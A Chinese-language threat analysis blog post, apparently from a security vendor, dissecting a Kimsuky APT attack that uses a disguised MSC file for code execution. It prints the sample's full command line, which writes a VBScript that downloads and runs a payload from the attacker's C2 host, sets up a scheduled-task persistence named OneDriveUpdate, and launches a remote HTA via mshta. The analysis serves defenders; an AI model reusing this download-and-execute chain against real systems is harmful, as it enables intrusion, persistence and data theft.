• 攻鉴(AS BAS)
    突破与攻击模拟系统
  • 觅影(AS EASM)
    外部攻击面管理系统
  • 安全研究
  • 安全测试
  • 应急响应
  • 攻防演练
  • 安全培训
  • 公司简介
  • 新闻动态
  • 加入我们
    • 技术分享
    从APT组织Kimsuky的MSC攻击样本到免杀伪装
    发布时间 · 2024-12-31

    背景

     在微软将互联网来源文档的Office宏默认禁用后,攻击者开始转向其他攻击手法,例如JavaScript、MSI文件、LNK对象和ISO文件。然而,这些技术也受到防御者的密切关注,被发现的可能性很高。所以击者会寻求利用新的或未公开的攻击向量,以在规避防御措施的同时获取访问权限。一个最近的例子是朝鲜APT组织Kimsuky利用MSC文件中新的命令执行技术。

     该技术允许攻击者在用户点击精心构造的MSC文件后,在mmc.exe的上下文中获得完全的代码执行权限。首个利用GrimResource的样本于6月6日上传至VirusTotal。

    什么是MMC

     Microsoft管理控制台 (Microsoft Management Console)

    Microsoft Management Console (MMC) 是 Microsoft Windows 操作系统的一个组件,它提供了一个界面,允许系统管理员和高级用户配置和监控系统。MMC 最初于 1998 年随 Windows NT 4.0 的 Option Pack 发布,后来与 Windows 2000 及其后续版本捆绑在一起。

     文件后缀(.msc)

    看到这个后缀,大家可能已经想到了组策略编辑器(gpedit.msc),按下 Win + R 组合键,输入 gpedit.msc,按回车键即可打开。

    样本分析

    攻击流程图

    攻击流程大致分为以下几个步骤:

    1.  初始投递阶段

     攻击者通过Facebook Messenger发送一个URL链接

     链接指向OneDrive,诱导受害者下载一个伪装的文件。

     文件伪装成MS Word文档,但实际上是一个MSC文件Microsoft Management Console 文件),图标也被伪装成Word文档以欺骗用户。

    2.  恶意文件执行

     当受害者打开该MSC文件时,实际上触发了Microsoft Management Console

     通过调用cmd.exe,执行一系列恶意命令,开始进一步的恶意活动。

    3.  C2通信与指令执行

     文件与C2服务器(brandwizer[.]co[.]in) 建立连接,C2服务器下发指令,控制后续操作。

     当点击Open按钮时,会访问C2服务器的”/share”路径,返回包会重定向到一个Google Docs链接,该链接为一个诱饵文件(Essay on Resolution of Korean Forced Labor Claims.docx),使其看起来像正常行为,进一步欺骗受害者,掩盖恶意行为。

     使用echo 将msc文件中的恶意代码写入到warm.vbs文件中。

     使用 schtasks(Windows任务计划程序)创建一个名为OneDriveUpdate的任务,保持41分钟的周期执行,确保恶意代码的持久化。 

    /c mode 15,1  & start explorer "https://brandwizer.co[.]in/green_pad/wp-content/plugins/custom-post-type-maker/essay/share"  &echo On Error Resume Next:Set ws = CreateObject("WScript.Shell"):Set fs = CreateObject("Scripting.FileSystemObject"):Set Post0 = CreateObject("msxml2.xmlhttp"):gpath = ws.ExpandEnvironmentStrings("%appdata%") + "\Microsoft\cool.gif":bpath = ws.ExpandEnvironmentStrings("%appdata%") + "\Microsoft\cool.bat":If fs.FileExists(gpath) Then:re=fs.movefile(gpath,bpath):re=ws.run(bpath,0,true):fs.deletefile(bpath):Else:Post0.open "GET", "https://brandwizer.co[.]in/green_pad/wp-content/plugins/custom-post-type-maker/essay/d.php?na=battmp",False: Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded":Post0.Send:t0=Post0.responseText:Set f = fs.CreateTextFile(gpath,True):f.Write(t0):f.Close:End If: > "C:\Users\Public\music\warm.vbs"  &schtasks /create /tn OneDriveUpdate /tr "wscript.exe /b "C:\Users\Public\music\warm.vbs"" /sc minute /mo 41 /f  &start /min mshta https://brandwizer.co[.]in/green_pad/wp-content/plugins/custom-post-type-maker/essay/ttt.hta

    4.  信息窃取和持久化(类似ReconShark 恶意软件家族)

     ReconShark 的主要功能是窃取受害者的相关信息,例如正在运行的进程、有关连接到系统的电池的信息以及部署的终端威胁检测机制。

     warm.vbs下载“d.php?na=battmp”中的文件到cool.gif文件中,并重命名为cool.bat执行。

     使用mshta远程加载ttt.hta脚本文件。

     脚本内部加载了 temp.vbs 文件,用于收集系统信息、是否存在防病毒软件进程等操作。

     ReconShark 恶意软件将收集的信息存储在字符串变量中,然后通过发出 HTTP POST 请求将其上传到 C2 服务器。